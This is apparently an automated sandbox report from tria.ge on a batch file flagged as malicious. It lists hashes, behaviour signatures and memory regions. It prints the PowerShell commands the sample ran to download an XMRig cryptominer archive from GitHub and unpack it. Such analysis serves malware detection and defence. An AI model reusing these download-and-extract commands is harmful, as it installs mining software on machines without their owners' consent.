Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    0s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    22/12/2023, 05:54

General

  • Target

    tesy - Copy (9).bat

  • Size

    608B

  • MD5

    727c8da0478af118c957ae60f7161cab

  • SHA1

    cf18105b8659e93bbd2824fa35ef1bae7b395301

  • SHA256

    97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

  • SHA512

    d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
    1⤵
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1592
  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (9).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
      2⤵
        PID:2320

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXMNZ9C9EN18CGCKVA12.temp

      Filesize

      7KB

      MD5

      ea9e900ebb638cdb2b7c86960361689b

      SHA1

      25a8a0b4cd87ce7f5b89660bd88ce7bef47b1b1b

      SHA256

      2e371231257788ab3a087fc91d950f2aa7caa8b1ee13b5685b6ea65f7ea34108

      SHA512

      f8d3c3b1bb897f8b935ffa991fa307d30f5f236d49cb3c47aba23044caeb543a2def9863f75212582961d684100f1c72d49501f49871fbc733753b29cdeb52c6

    • memory/1592-12-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

      Filesize

      9.6MB

    • memory/1592-7-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

    • memory/1592-9-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

    • memory/1592-8-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

      Filesize

      9.6MB

    • memory/1592-6-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

      Filesize

      9.6MB

    • memory/1592-4-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

    • memory/1592-11-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

    • memory/1592-5-0x00000000022D0000-0x00000000022D8000-memory.dmp

      Filesize

      32KB

    • memory/1592-10-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

    • memory/2320-22-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2320-19-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2320-25-0x0000000002840000-0x00000000028C0000-memory.dmp

      Filesize

      512KB

    • memory/2320-24-0x0000000002840000-0x00000000028C0000-memory.dmp

      Filesize

      512KB

    • memory/2320-23-0x0000000002840000-0x00000000028C0000-memory.dmp

      Filesize

      512KB

    • memory/2320-26-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2320-21-0x0000000002790000-0x0000000002798000-memory.dmp

      Filesize

      32KB

    • memory/2320-20-0x0000000002840000-0x00000000028C0000-memory.dmp

      Filesize

      512KB

    • memory/2320-18-0x000000001B470000-0x000000001B752000-memory.dmp

      Filesize

      2.9MB